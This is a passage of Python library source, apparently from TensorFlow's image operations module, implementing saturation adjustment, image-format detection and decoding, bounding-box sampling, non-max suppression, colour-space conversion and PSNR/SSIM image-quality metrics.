Equivalent to `adjust_saturation()` but uses a `saturation_factor` randomly
picked in the interval `[lower, upper]`.
Args:
image: RGB image or images. Size of the last dimension must be 3.
lower: float. Lower bound for the random saturation factor.
upper: float. Upper bound for the random saturation factor.
seed: An operation-specific seed. It will be used in conjunction with the
graph-level seed to determine the real seeds that will be used in this
operation. Please see the documentation of set_random_seed for its
interaction with the graph-level random seed.
Returns:
Adjusted image(s), same shape and DType as `image`.
Raises:
ValueError: if `upper <= lower` or if `lower < 0`.
"""
if upper <= lower:
raise ValueError('upper must be > lower.')
if lower < 0:
raise ValueError('lower must be non-negative.')
# Pick a float in [lower, upper]
saturation_factor = random_ops.random_uniform([], lower, upper, seed=seed)
return adjust_saturation(image, saturation_factor)
@tf_export('image.adjust_saturation')
def adjust_saturation(image, saturation_factor, name=None):
"""Adjust saturation of RGB images.
This is a convenience method that converts RGB images to float
  representation, converts them to HSV, scales the saturation (S) channel,
converts back to RGB and then back to the original data type. If several
adjustments are chained it is advisable to minimize the number of redundant
conversions.
`image` is an RGB image or images. The image saturation is adjusted by
converting the images to HSV and multiplying the saturation (S) channel by
`saturation_factor` and clipping. The images are then converted back to RGB.
Args:
image: RGB image or images. Size of the last dimension must be 3.
saturation_factor: float. Factor to multiply the saturation by.
name: A name for this operation (optional).
Returns:
Adjusted image(s), same shape and DType as `image`.
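  For example, a sketch (illustrative; assumes `import tensorflow as tf`; a
  factor below 1 desaturates the image):
  ```python
  image = tf.random_uniform([8, 8, 3], dtype=tf.float32)
  muted = tf.image.adjust_saturation(image, saturation_factor=0.5)
  ```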
"""
with ops.name_scope(name, 'adjust_saturation', [image]) as name:
image = ops.convert_to_tensor(image, name='image')
    # Remember the original dtype so we can convert back if needed
orig_dtype = image.dtype
if orig_dtype in (dtypes.float16, dtypes.float32):
flt_image = image
else:
flt_image = convert_image_dtype(image, dtypes.float32)
adjusted = gen_image_ops.adjust_saturation(flt_image, saturation_factor)
return convert_image_dtype(adjusted, orig_dtype)
@tf_export('io.is_jpeg', 'image.is_jpeg', v1=['io.is_jpeg', 'image.is_jpeg'])
def is_jpeg(contents, name=None):
r"""Convenience function to check if the 'contents' encodes a JPEG image.
Args:
contents: 0-D `string`. The encoded image bytes.
name: A name for the operation (optional)
Returns:
A scalar boolean tensor indicating if 'contents' may be a JPEG image.
is_jpeg is susceptible to false positives.
"""
# Normal JPEGs start with \xff\xd8\xff\xe0
  # JPEG with EXIF starts with \xff\xd8\xff\xe1
# Use \xff\xd8\xff to cover both.
with ops.name_scope(name, 'is_jpeg'):
substr = string_ops.substr(contents, 0, 3)
return math_ops.equal(substr, b'\xff\xd8\xff', name=name)
def _is_png(contents, name=None):
r"""Convenience function to check if the 'contents' encodes a PNG image.
Args:
contents: 0-D `string`. The encoded image bytes.
name: A name for the operation (optional)
Returns:
A scalar boolean tensor indicating if 'contents' may be a PNG image.
is_png is susceptible to false positives.
"""
with ops.name_scope(name, 'is_png'):
substr = string_ops.substr(contents, 0, 3)
return math_ops.equal(substr, b'\211PN', name=name)
tf_export('io.decode_and_crop_jpeg', 'image.decode_and_crop_jpeg',
v1=['io.decode_and_crop_jpeg', 'image.decode_and_crop_jpeg'])(
gen_image_ops.decode_and_crop_jpeg)
tf_export('io.decode_bmp', 'image.decode_bmp',
v1=['io.decode_bmp', 'image.decode_bmp'])(gen_image_ops.decode_bmp)
tf_export('io.decode_gif', 'image.decode_gif',
v1=['io.decode_gif', 'image.decode_gif'])(gen_image_ops.decode_gif)
tf_export('io.decode_jpeg', 'image.decode_jpeg',
v1=['io.decode_jpeg', 'image.decode_jpeg'])(gen_image_ops.decode_jpeg)
tf_export('io.decode_png', 'image.decode_png',
v1=['io.decode_png', 'image.decode_png'])(gen_image_ops.decode_png)
tf_export('io.encode_jpeg', 'image.encode_jpeg',
v1=['io.encode_jpeg', 'image.encode_jpeg'])(gen_image_ops.encode_jpeg)
tf_export('io.extract_jpeg_shape', 'image.extract_jpeg_shape',
v1=['io.extract_jpeg_shape', 'image.extract_jpeg_shape'])(
gen_image_ops.extract_jpeg_shape)
@tf_export('io.decode_image', 'image.decode_image',
v1=['io.decode_image', 'image.decode_image'])
def decode_image(contents, channels=None, dtype=dtypes.uint8, name=None):
"""Convenience function for `decode_bmp`, `decode_gif`, `decode_jpeg`,
and `decode_png`.
Detects whether an image is a BMP, GIF, JPEG, or PNG, and performs the
appropriate operation to convert the input bytes `string` into a `Tensor`
of type `dtype`.
Note: `decode_gif` returns a 4-D array `[num_frames, height, width, 3]`, as
opposed to `decode_bmp`, `decode_jpeg` and `decode_png`, which return 3-D
arrays `[height, width, num_channels]`. Make sure to take this into account
when constructing your graph if you are intermixing GIF files with BMP, JPEG,
and/or PNG files.
Args:
contents: 0-D `string`. The encoded image bytes.
channels: An optional `int`. Defaults to `0`. Number of color channels for
the decoded image.
dtype: The desired DType of the returned `Tensor`.
name: A name for the operation (optional)
Returns:
`Tensor` with type `dtype` and shape `[height, width, num_channels]` for
BMP, JPEG, and PNG images and shape `[num_frames, height, width, 3]` for
GIF images.
Raises:
ValueError: On incorrect number of channels.
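  For example, a sketch (illustrative; assumes `import tensorflow as tf`; the
  file path is hypothetical):
  ```python
  contents = tf.io.read_file('/tmp/example.png')  # hypothetical path
  image = tf.image.decode_image(contents, channels=3)
  # `image` is a uint8 Tensor; its static shape is unknown because the input
  # could also have been a 4-D GIF.
  ```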
"""
with ops.name_scope(name, 'decode_image'):
if channels not in (None, 0, 1, 3, 4):
raise ValueError('channels must be in (None, 0, 1, 3, 4)')
substr = string_ops.substr(contents, 0, 3)
def _bmp():
"""Decodes a GIF image."""
signature = string_ops.substr(contents, 0, 2)
# Create assert op to check that bytes are BMP decodable
is_bmp = math_ops.equal(signature, 'BM', name='is_bmp')
decode_msg = 'Unable to decode bytes as JPEG, PNG, GIF, or BMP'
assert_decode = control_flow_ops.Assert(is_bmp, [decode_msg])
bmp_channels = 0 if channels is None else channels
good_channels = math_ops.not_equal(bmp_channels, 1, name='check_channels')
channels_msg = 'Channels must be in (None, 0, 3) when decoding BMP images'
assert_channels = control_flow_ops.Assert(good_channels, [channels_msg])
with ops.control_dependencies([assert_decode, assert_channels]):
return convert_image_dtype(gen_image_ops.decode_bmp(contents), dtype)
def _gif():
      # Create an assert to make sure that channels is not set to 1 or 4,
      # which GIF decoding does not support (channels was already restricted
      # to (None, 0, 1, 3, 4) above).
gif_channels = 0 if channels is None else channels
good_channels = math_ops.logical_and(
math_ops.not_equal(gif_channels, 1, name='check_gif_channels'),
math_ops.not_equal(gif_channels, 4, name='check_gif_channels'))
channels_msg = 'Channels must be in (None, 0, 3) when decoding GIF images'
assert_channels = control_flow_ops.Assert(good_channels, [channels_msg])
with ops.control_dependencies([assert_channels]):
return convert_image_dtype(gen_image_ops.decode_gif(contents), dtype)
def check_gif():
# Create assert op to check that bytes are GIF decodable
is_gif = math_ops.equal(substr, b'\x47\x49\x46', name='is_gif')
return control_flow_ops.cond(is_gif, _gif, _bmp, name='cond_gif')
def _png():
"""Decodes a PNG image."""
return convert_image_dtype(
gen_image_ops.decode_png(contents, channels,
dtype=dtypes.uint8
if dtype == dtypes.uint8
else dtypes.uint16), dtype)
def check_png():
"""Checks if an image is PNG."""
return control_flow_ops.cond(
_is_png(contents), _png, check_gif, name='cond_png')
def _jpeg():
"""Decodes a jpeg image."""
jpeg_channels = 0 if channels is None else channels
good_channels = math_ops.not_equal(
jpeg_channels, 4, name='check_jpeg_channels')
channels_msg = ('Channels must be in (None, 0, 1, 3) when decoding JPEG '
'images')
assert_channels = control_flow_ops.Assert(good_channels, [channels_msg])
with ops.control_dependencies([assert_channels]):
return convert_image_dtype(
gen_image_ops.decode_jpeg(contents, channels), dtype)
# Decode normal JPEG images (start with \xff\xd8\xff\xe0)
# as well as JPEG images with EXIF data (start with \xff\xd8\xff\xe1).
return control_flow_ops.cond(
is_jpeg(contents), _jpeg, check_png, name='cond_jpeg')
@tf_export('image.total_variation')
def total_variation(images, name=None):
"""Calculate and return the total variation for one or more images.
The total variation is the sum of the absolute differences for neighboring
pixel-values in the input images. This measures how much noise is in the
images.
This can be used as a loss-function during optimization so as to suppress
noise in images. If you have a batch of images, then you should calculate
the scalar loss-value as the sum:
`loss = tf.reduce_sum(tf.image.total_variation(images))`
This implements the anisotropic 2-D version of the formula described here:
https://en.wikipedia.org/wiki/Total_variation_denoising
Args:
images: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
name: A name for the operation (optional).
Raises:
ValueError: if images.shape is not a 3-D or 4-D vector.
Returns:
The total variation of `images`.
If `images` was 4-D, return a 1-D float Tensor of shape `[batch]` with the
total variation for each image in the batch.
If `images` was 3-D, return a scalar float with the total variation for
that image.
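  For example, a sketch of using it as a regularization loss (illustrative;
  assumes `import tensorflow as tf`):
  ```python
  images = tf.random_uniform([4, 32, 32, 3])
  tv = tf.image.total_variation(images)  # shape [4], one value per image
  loss = tf.reduce_sum(tv)
  ```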
"""
with ops.name_scope(name, 'total_variation'):
ndims = images.get_shape().ndims
if ndims == 3:
# The input is a single image with shape [height, width, channels].
# Calculate the difference of neighboring pixel-values.
# The images are shifted one pixel along the height and width by slicing.
pixel_dif1 = images[1:, :, :] - images[:-1, :, :]
pixel_dif2 = images[:, 1:, :] - images[:, :-1, :]
      # Sum over all axes. (None is an alias for all axes.)
sum_axis = None
elif ndims == 4:
# The input is a batch of images with shape:
# [batch, height, width, channels].
# Calculate the difference of neighboring pixel-values.
# The images are shifted one pixel along the height and width by slicing.
pixel_dif1 = images[:, 1:, :, :] - images[:, :-1, :, :]
pixel_dif2 = images[:, :, 1:, :] - images[:, :, :-1, :]
      # Only sum over the last 3 axes.
# This results in a 1-D tensor with the total variation for each image.
sum_axis = [1, 2, 3]
else:
raise ValueError('\'images\' must be either 3 or 4-dimensional.')
# Calculate the total variation by taking the absolute value of the
# pixel-differences and summing over the appropriate axis.
tot_var = (
math_ops.reduce_sum(math_ops.abs(pixel_dif1), axis=sum_axis) +
math_ops.reduce_sum(math_ops.abs(pixel_dif2), axis=sum_axis))
return tot_var
@tf_export('image.sample_distorted_bounding_box', v1=[])
def sample_distorted_bounding_box_v2(image_size,
bounding_boxes,
seed=0,
min_object_covered=0.1,
aspect_ratio_range=None,
area_range=None,
max_attempts=None,
use_image_if_no_bounding_boxes=None,
name=None):
"""Generate a single randomly distorted bounding box for an image.
Bounding box annotations are often supplied in addition to ground-truth labels
in image recognition or object localization tasks. A common technique for
training such a system is to randomly distort an image while preserving
its content, i.e. *data augmentation*. This Op outputs a randomly distorted
localization of an object, i.e. bounding box, given an `image_size`,
`bounding_boxes` and a series of constraints.
The output of this Op is a single bounding box that may be used to crop the
original image. The output is returned as 3 tensors: `begin`, `size` and
`bboxes`. The first 2 tensors can be fed directly into `tf.slice` to crop the
image. The latter may be supplied to `tf.image.draw_bounding_boxes` to
visualize what the bounding box looks like.
Bounding boxes are supplied and returned as `[y_min, x_min, y_max, x_max]`.
The bounding box coordinates are floats in `[0.0, 1.0]` relative to the width
and height of the underlying image.
For example,
```python
# Generate a single distorted bounding box.
begin, size, bbox_for_draw = tf.image.sample_distorted_bounding_box(
tf.shape(image),
bounding_boxes=bounding_boxes,
min_object_covered=0.1)
# Draw the bounding box in an image summary.
image_with_box = tf.image.draw_bounding_boxes(tf.expand_dims(image, 0),
bbox_for_draw)
tf.summary.image('images_with_box', image_with_box)
# Employ the bounding box to distort the image.
distorted_image = tf.slice(image, begin, size)
```
Note that if no bounding box information is available, setting
`use_image_if_no_bounding_boxes = true` will assume there is a single implicit
bounding box covering the whole image. If `use_image_if_no_bounding_boxes` is
false and no bounding boxes are supplied, an error is raised.
Args:
image_size: A `Tensor`. Must be one of the following types: `uint8`, `int8`,
`int16`, `int32`, `int64`.
1-D, containing `[height, width, channels]`.
bounding_boxes: A `Tensor` of type `float32`.
3-D with shape `[batch, N, 4]` describing the N bounding boxes
associated with the image.
seed: An optional `int`. Defaults to `0`.
If `seed` is set to non-zero, the random number generator is seeded by
the given `seed`. Otherwise, it is seeded by a random seed.
min_object_covered: A Tensor of type `float32`. Defaults to `0.1`.
The cropped area of the image must contain at least this
fraction of any bounding box supplied. The value of this parameter should
be non-negative. In the case of 0, the cropped area does not need to
overlap any of the bounding boxes supplied.
aspect_ratio_range: An optional list of `floats`. Defaults to `[0.75,
1.33]`.
The cropped area of the image must have an aspect `ratio =
width / height` within this range.
area_range: An optional list of `floats`. Defaults to `[0.05, 1]`.
The cropped area of the image must contain a fraction of the
supplied image within this range.
max_attempts: An optional `int`. Defaults to `100`.
Number of attempts at generating a cropped region of the image
of the specified constraints. After `max_attempts` failures, return the
entire image.
use_image_if_no_bounding_boxes: An optional `bool`. Defaults to `False`.
Controls behavior if no bounding boxes supplied.
If true, assume an implicit bounding box covering the whole input. If
false, raise an error.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (begin, size, bboxes).
begin: A `Tensor`. Has the same type as `image_size`. 1-D, containing
`[offset_height, offset_width, 0]`. Provide as input to
`tf.slice`.
size: A `Tensor`. Has the same type as `image_size`. 1-D, containing
`[target_height, target_width, -1]`. Provide as input to
`tf.slice`.
bboxes: A `Tensor` of type `float32`. 3-D with shape `[1, 1, 4]` containing
the distorted bounding box.
Provide as input to `tf.image.draw_bounding_boxes`.
"""
seed1, seed2 = random_seed.get_seed(seed) if seed else (0, 0)
return sample_distorted_bounding_box(
image_size, bounding_boxes, seed1, seed2, min_object_covered,
aspect_ratio_range, area_range, max_attempts,
use_image_if_no_bounding_boxes, name)
@tf_export(v1=['image.sample_distorted_bounding_box'])
@deprecation.deprecated(date=None, instructions='`seed2` arg is deprecated. '
                        'Use sample_distorted_bounding_box_v2 instead.')
def sample_distorted_bounding_box(image_size,
bounding_boxes,
seed=None,
seed2=None,
min_object_covered=0.1,
aspect_ratio_range=None,
area_range=None,
max_attempts=None,
use_image_if_no_bounding_boxes=None,
name=None):
"""Generate a single randomly distorted bounding box for an image.
Bounding box annotations are often supplied in addition to ground-truth labels
in image recognition or object localization tasks. A common technique for
training such a system is to randomly distort an image while preserving
its content, i.e. *data augmentation*. This Op outputs a randomly distorted
localization of an object, i.e. bounding box, given an `image_size`,
`bounding_boxes` and a series of constraints.
The output of this Op is a single bounding box that may be used to crop the
original image. The output is returned as 3 tensors: `begin`, `size` and
`bboxes`. The first 2 tensors can be fed directly into `tf.slice` to crop the
image. The latter may be supplied to `tf.image.draw_bounding_boxes` to
visualize
what the bounding box looks like.
Bounding boxes are supplied and returned as `[y_min, x_min, y_max, x_max]`.
The
bounding box coordinates are floats in `[0.0, 1.0]` relative to the width and
height of the underlying image.
For example,
```python
# Generate a single distorted bounding box.
begin, size, bbox_for_draw = tf.image.sample_distorted_bounding_box(
tf.shape(image),
bounding_boxes=bounding_boxes,
min_object_covered=0.1)
# Draw the bounding box in an image summary.
image_with_box = tf.image.draw_bounding_boxes(tf.expand_dims(image, 0),
bbox_for_draw)
tf.summary.image('images_with_box', image_with_box)
# Employ the bounding box to distort the image.
distorted_image = tf.slice(image, begin, size)
```
Note that if no bounding box information is available, setting
`use_image_if_no_bounding_boxes = true` will assume there is a single implicit
bounding box covering the whole image. If `use_image_if_no_bounding_boxes` is
false and no bounding boxes are supplied, an error is raised.
Args:
image_size: A `Tensor`. Must be one of the following types: `uint8`, `int8`,
`int16`, `int32`, `int64`.
1-D, containing `[height, width, channels]`.
bounding_boxes: A `Tensor` of type `float32`.
3-D with shape `[batch, N, 4]` describing the N bounding boxes
associated with the image.
seed: An optional `int`. Defaults to `0`.
If either `seed` or `seed2` are set to non-zero, the random number
generator is seeded by the given `seed`. Otherwise, it is seeded by a
random
seed.
seed2: An optional `int`. Defaults to `0`.
A second seed to avoid seed collision.
min_object_covered: A Tensor of type `float32`. Defaults to `0.1`.
The cropped area of the image must contain at least this
fraction of any bounding box supplied. The value of this parameter should
      be non-negative. In the case of 0, the cropped area does not need to
      overlap any of the bounding boxes supplied.
    aspect_ratio_range: An optional list of `floats`. Defaults to
      `[0.75, 1.33]`.
The cropped area of the image must have an aspect ratio =
width / height within this range.
area_range: An optional list of `floats`. Defaults to `[0.05, 1]`.
The cropped area of the image must contain a fraction of the
supplied image within this range.
max_attempts: An optional `int`. Defaults to `100`.
Number of attempts at generating a cropped region of the image
of the specified constraints. After `max_attempts` failures, return the
      entire image.
use_image_if_no_bounding_boxes: An optional `bool`. Defaults to `False`.
Controls behavior if no bounding boxes supplied.
If true, assume an implicit bounding box covering the whole input. If
      false, raise an error.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (begin, size, bboxes).
begin: A `Tensor`. Has the same type as `image_size`. 1-D, containing
`[offset_height, offset_width, 0]`. Provide as input to
`tf.slice`.
size: A `Tensor`. Has the same type as `image_size`. 1-D, containing
`[target_height, target_width, -1]`. Provide as input to
`tf.slice`.
bboxes: A `Tensor` of type `float32`. 3-D with shape `[1, 1, 4]` containing
the distorted bounding box.
Provide as input to `tf.image.draw_bounding_boxes`.
"""
with ops.name_scope(name, 'sample_distorted_bounding_box'):
return gen_image_ops.sample_distorted_bounding_box_v2(
image_size,
bounding_boxes,
seed=seed,
seed2=seed2,
min_object_covered=min_object_covered,
aspect_ratio_range=aspect_ratio_range,
area_range=area_range,
max_attempts=max_attempts,
use_image_if_no_bounding_boxes=use_image_if_no_bounding_boxes,
name=name)
@tf_export('image.non_max_suppression')
def non_max_suppression(boxes,
scores,
max_output_size,
iou_threshold=0.5,
score_threshold=float('-inf'),
name=None):
"""Greedily selects a subset of bounding boxes in descending order of score.
Prunes away boxes that have high intersection-over-union (IOU) overlap
with previously selected boxes. Bounding boxes are supplied as
[y1, x1, y2, x2], where (y1, x1) and (y2, x2) are the coordinates of any
diagonal pair of box corners and the coordinates can be provided as normalized
(i.e., lying in the interval [0, 1]) or absolute. Note that this algorithm
is agnostic to where the origin is in the coordinate system. Note that this
algorithm is invariant to orthogonal transformations and translations
  of the coordinate system; thus translations or reflections of the coordinate
system result in the same boxes being selected by the algorithm.
The output of this operation is a set of integers indexing into the input
collection of bounding boxes representing the selected boxes. The bounding
box coordinates corresponding to the selected indices can then be obtained
  using the `tf.gather` operation. For example:
selected_indices = tf.image.non_max_suppression(
boxes, scores, max_output_size, iou_threshold)
selected_boxes = tf.gather(boxes, selected_indices)
Args:
boxes: A 2-D float `Tensor` of shape `[num_boxes, 4]`.
scores: A 1-D float `Tensor` of shape `[num_boxes]` representing a single
score corresponding to each box (each row of boxes).
max_output_size: A scalar integer `Tensor` representing the maximum number
of boxes to be selected by non max suppression.
iou_threshold: A float representing the threshold for deciding whether boxes
overlap too much with respect to IOU.
score_threshold: A float representing the threshold for deciding when to
remove boxes based on score.
name: A name for the operation (optional).
Returns:
selected_indices: A 1-D integer `Tensor` of shape `[M]` representing the
selected indices from the boxes tensor, where `M <= max_output_size`.
"""
with ops.name_scope(name, 'non_max_suppression'):
iou_threshold = ops.convert_to_tensor(iou_threshold, name='iou_threshold')
score_threshold = ops.convert_to_tensor(
score_threshold, name='score_threshold')
return gen_image_ops.non_max_suppression_v3(boxes, scores, max_output_size,
iou_threshold, score_threshold)
@tf_export('image.non_max_suppression_padded')
def non_max_suppression_padded(boxes,
scores,
max_output_size,
iou_threshold=0.5,
score_threshold=float('-inf'),
pad_to_max_output_size=False,
name=None):
"""Greedily selects a subset of bounding boxes in descending order of score.
  Performs an operation algorithmically equivalent to
  `tf.image.non_max_suppression`, with the addition of an optional parameter
  which zero-pads the output to be of size `max_output_size`.
The output of this operation is a tuple containing the set of integers
indexing into the input collection of bounding boxes representing the selected
boxes and the number of valid indices in the index set. The bounding box
coordinates corresponding to the selected indices can then be obtained using
the `tf.slice` and `tf.gather` operations. For example:
selected_indices_padded, num_valid = tf.image.non_max_suppression_padded(
boxes, scores, max_output_size, iou_threshold,
score_threshold, pad_to_max_output_size=True)
selected_indices = tf.slice(
selected_indices_padded, tf.constant([0]), num_valid)
selected_boxes = tf.gather(boxes, selected_indices)
Args:
boxes: A 2-D float `Tensor` of shape `[num_boxes, 4]`.
scores: A 1-D float `Tensor` of shape `[num_boxes]` representing a single
score corresponding to each box (each row of boxes).
max_output_size: A scalar integer `Tensor` representing the maximum number
of boxes to be selected by non max suppression.
iou_threshold: A float representing the threshold for deciding whether boxes
overlap too much with respect to IOU.
score_threshold: A float representing the threshold for deciding when to
remove boxes based on score.
pad_to_max_output_size: bool. If True, size of `selected_indices` output
is padded to `max_output_size`.
name: A name for the operation (optional).
Returns:
selected_indices: A 1-D integer `Tensor` of shape `[M]` representing the
selected indices from the boxes tensor, where `M <= max_output_size`.
valid_outputs: A scalar integer `Tensor` denoting how many elements in
`selected_indices` are valid. Valid elements occur first, then padding.
"""
with ops.name_scope(name, 'non_max_suppression_padded'):
iou_threshold = ops.convert_to_tensor(iou_threshold, name='iou_threshold')
score_threshold = ops.convert_to_tensor(
score_threshold, name='score_threshold')
if compat.forward_compatible(2018, 8, 7) or pad_to_max_output_size:
return gen_image_ops.non_max_suppression_v4(
boxes, scores, max_output_size, iou_threshold, score_threshold,
pad_to_max_output_size)
else:
return gen_image_ops.non_max_suppression_v3(
boxes, scores, max_output_size, iou_threshold, score_threshold)
@tf_export('image.non_max_suppression_overlaps')
def non_max_suppression_with_overlaps(overlaps,
scores,
max_output_size,
overlap_threshold=0.5,
score_threshold=float('-inf'),
name=None):
"""Greedily selects a subset of bounding boxes in descending order of score.
Prunes away boxes that have high overlap with previously selected boxes.
  Overlap values are supplied as an N-by-N square matrix.
The output of this operation is a set of integers indexing into the input
collection of bounding boxes representing the selected boxes. The bounding
box coordinates corresponding to the selected indices can then be obtained
  using the `tf.gather` operation. For example:
selected_indices = tf.image.non_max_suppression_overlaps(
        overlaps, scores, max_output_size, overlap_threshold)
selected_boxes = tf.gather(boxes, selected_indices)
Args:
overlaps: A 2-D float `Tensor` of shape `[num_boxes, num_boxes]`.
scores: A 1-D float `Tensor` of shape `[num_boxes]` representing a single
score corresponding to each box (each row of boxes).
max_output_size: A scalar integer `Tensor` representing the maximum number
of boxes to be selected by non max suppression.
overlap_threshold: A float representing the threshold for deciding whether
boxes overlap too much with respect to the provided overlap values.
score_threshold: A float representing the threshold for deciding when to
remove boxes based on score.
name: A name for the operation (optional).
Returns:
selected_indices: A 1-D integer `Tensor` of shape `[M]` representing the
selected indices from the overlaps tensor, where `M <= max_output_size`.
"""
with ops.name_scope(name, 'non_max_suppression_overlaps'):
overlap_threshold = ops.convert_to_tensor(
overlap_threshold, name='overlap_threshold')
# pylint: disable=protected-access
return gen_image_ops.non_max_suppression_with_overlaps(
overlaps, scores, max_output_size, overlap_threshold, score_threshold)
# pylint: enable=protected-access
_rgb_to_yiq_kernel = [[0.299, 0.59590059,
0.2115], [0.587, -0.27455667, -0.52273617],
[0.114, -0.32134392, 0.31119955]]
@tf_export('image.rgb_to_yiq')
def rgb_to_yiq(images):
"""Converts one or more images from RGB to YIQ.
Outputs a tensor of the same shape as the `images` tensor, containing the YIQ
value of the pixels.
  The output is only well defined if the values in `images` are in [0, 1].
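  Example (a hedged sketch; `rgb_images` is assumed to be a float32 tensor with
  values in [0, 1] and a last dimension of size 3):
  ```python
  yiq_images = tf.image.rgb_to_yiq(rgb_images)
  rgb_again = tf.image.yiq_to_rgb(yiq_images)
  ```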
Args:
images: 2-D or higher rank. Image data to convert. Last dimension must be
size 3.
Returns:
images: tensor with the same shape as `images`.
"""
images = ops.convert_to_tensor(images, name='images')
kernel = ops.convert_to_tensor(
_rgb_to_yiq_kernel, dtype=images.dtype, name='kernel')
ndims = images.get_shape().ndims
return math_ops.tensordot(images, kernel, axes=[[ndims - 1], [0]])
_yiq_to_rgb_kernel = [[1, 1, 1], [0.95598634, -0.27201283, -1.10674021],
[0.6208248, -0.64720424, 1.70423049]]
@tf_export('image.yiq_to_rgb')
def yiq_to_rgb(images):
"""Converts one or more images from YIQ to RGB.
Outputs a tensor of the same shape as the `images` tensor, containing the RGB
value of the pixels.
  The output is only well defined if the Y values in `images` are in [0, 1],
  the I values in [-0.5957, 0.5957], and the Q values in [-0.5226, 0.5226].
Args:
images: 2-D or higher rank. Image data to convert. Last dimension must be
size 3.
Returns:
images: tensor with the same shape as `images`.
"""
images = ops.convert_to_tensor(images, name='images')
kernel = ops.convert_to_tensor(
_yiq_to_rgb_kernel, dtype=images.dtype, name='kernel')
ndims = images.get_shape().ndims
return math_ops.tensordot(images, kernel, axes=[[ndims - 1], [0]])
_rgb_to_yuv_kernel = [[0.299, -0.14714119,
0.61497538], [0.587, -0.28886916, -0.51496512],
[0.114, 0.43601035, -0.10001026]]
@tf_export('image.rgb_to_yuv')
def rgb_to_yuv(images):
"""Converts one or more images from RGB to YUV.
Outputs a tensor of the same shape as the `images` tensor, containing the YUV
value of the pixels.
  The output is only well defined if the values in `images` are in [0, 1].
Args:
images: 2-D or higher rank. Image data to convert. Last dimension must be
size 3.
Returns:
images: tensor with the same shape as `images`.
"""
images = ops.convert_to_tensor(images, name='images')
kernel = ops.convert_to_tensor(
_rgb_to_yuv_kernel, dtype=images.dtype, name='kernel')
ndims = images.get_shape().ndims
return math_ops.tensordot(images, kernel, axes=[[ndims - 1], [0]])
_yuv_to_rgb_kernel = [[1, 1, 1], [0, -0.394642334, 2.03206185],
[1.13988303, -0.58062185, 0]]
@tf_export('image.yuv_to_rgb')
def yuv_to_rgb(images):
"""Converts one or more images from YUV to RGB.
Outputs a tensor of the same shape as the `images` tensor, containing the RGB
value of the pixels.
  The output is only well defined if the Y values in `images` are in [0, 1],
  and the U and V values are in [-0.5, 0.5].
Args:
images: 2-D or higher rank. Image data to convert. Last dimension must be
size 3.
Returns:
images: tensor with the same shape as `images`.
"""
images = ops.convert_to_tensor(images, name='images')
kernel = ops.convert_to_tensor(
_yuv_to_rgb_kernel, dtype=images.dtype, name='kernel')
ndims = images.get_shape().ndims
return math_ops.tensordot(images, kernel, axes=[[ndims - 1], [0]])
def _verify_compatible_image_shapes(img1, img2):
"""Checks if two image tensors are compatible for applying SSIM or PSNR.
This function checks if two sets of images have ranks at least 3, and if the
last three dimensions match.
Args:
img1: Tensor containing the first image batch.
img2: Tensor containing the second image batch.
Returns:
A tuple containing: the first tensor shape, the second tensor shape, and a
list of control_flow_ops.Assert() ops implementing the checks.
Raises:
ValueError: When static shape check fails.
"""
shape1 = img1.get_shape().with_rank_at_least(3)
shape2 = img2.get_shape().with_rank_at_least(3)
shape1[-3:].assert_is_compatible_with(shape2[-3:])
if shape1.ndims is not None and shape2.ndims is not None:
for dim1, dim2 in zip(reversed(shape1.dims[:-3]),
reversed(shape2.dims[:-3])):
if not (dim1 == 1 or dim2 == 1 or dim1.is_compatible_with(dim2)):
raise ValueError(
'Two images are not compatible: %s and %s' % (shape1, shape2))
# Now assign shape tensors.
shape1, shape2 = array_ops.shape_n([img1, img2])
# TODO(sjhwang): Check if shape1[:-3] and shape2[:-3] are broadcastable.
checks = []
checks.append(control_flow_ops.Assert(
math_ops.greater_equal(array_ops.size(shape1), 3),
[shape1, shape2], summarize=10))
checks.append(control_flow_ops.Assert(
math_ops.reduce_all(math_ops.equal(shape1[-3:], shape2[-3:])),
[shape1, shape2], summarize=10))
return shape1, shape2, checks
@tf_export('image.psnr')
def psnr(a, b, max_val, name=None):
"""Returns the Peak Signal-to-Noise Ratio between a and b.
This is intended to be used on signals (or images). Produces a PSNR value for
each image in batch.
The last three dimensions of input are expected to be [height, width, depth].
Example:
```python
# Read images from file.
im1 = tf.decode_png('path/to/im1.png')
im2 = tf.decode_png('path/to/im2.png')
# Compute PSNR over tf.uint8 Tensors.
psnr1 = tf.image.psnr(im1, im2, max_val=255)
# Compute PSNR over tf.float32 Tensors.
im1 = tf.image.convert_image_dtype(im1, tf.float32)
im2 = tf.image.convert_image_dtype(im2, tf.float32)
psnr2 = tf.image.psnr(im1, im2, max_val=1.0)
# psnr1 and psnr2 both have type tf.float32 and are almost equal.
```
Arguments:
a: First set of images.
b: Second set of images.
max_val: The dynamic range of the images (i.e., the difference between the
      maximum and the minimum allowed values).
name: Namespace to embed the computation in.
Returns:
The scalar PSNR between a and b. The returned tensor has type `tf.float32`
and shape [batch_size, 1].
"""
with ops.name_scope(name, 'PSNR', [a, b]):
# Need to convert the images to float32. Scale max_val accordingly so that
# PSNR is computed correctly.
max_val = math_ops.cast(max_val, a.dtype)
max_val = convert_image_dtype(max_val, dtypes.float32)
a = convert_image_dtype(a, dtypes.float32)
b = convert_image_dtype(b, dtypes.float32)
mse = math_ops.reduce_mean(math_ops.squared_difference(a, b), [-3, -2, -1])
psnr_val = math_ops.subtract(
20 * math_ops.log(max_val) / math_ops.log(10.0),
np.float32(10 / np.log(10)) * math_ops.log(mse),
name='psnr')
_, _, checks = _verify_compatible_image_shapes(a, b)
with ops.control_dependencies(checks):
return array_ops.identity(psnr_val)
_SSIM_K1 = 0.01
_SSIM_K2 = 0.03
def _ssim_helper(x, y, reducer, max_val, compensation=1.0):
r"""Helper function for computing SSIM.
SSIM estimates covariances with weighted sums. The default parameters
use a biased estimate of the covariance:
Suppose `reducer` is a weighted sum, then the mean estimators are
\mu_x = \sum_i w_i x_i,
\mu_y = \sum_i w_i y_i,
where w_i's are the weighted-sum weights, and covariance estimator is
cov_{xy} = \sum_i w_i (x_i - \mu_x) (y_i - \mu_y)
with assumption \sum_i w_i = 1. This covariance estimator is biased, since
E[cov_{xy}] = (1 - \sum_i w_i ^ 2) Cov(X, Y).
For SSIM measure with unbiased covariance estimators, pass as `compensation`
argument (1 - \sum_i w_i ^ 2).
Arguments:
x: First set of images.
y: Second set of images.
reducer: Function that computes 'local' averages from set of images.
      For the non-convolutional version, this is usually tf.reduce_mean(x, [1, 2]),
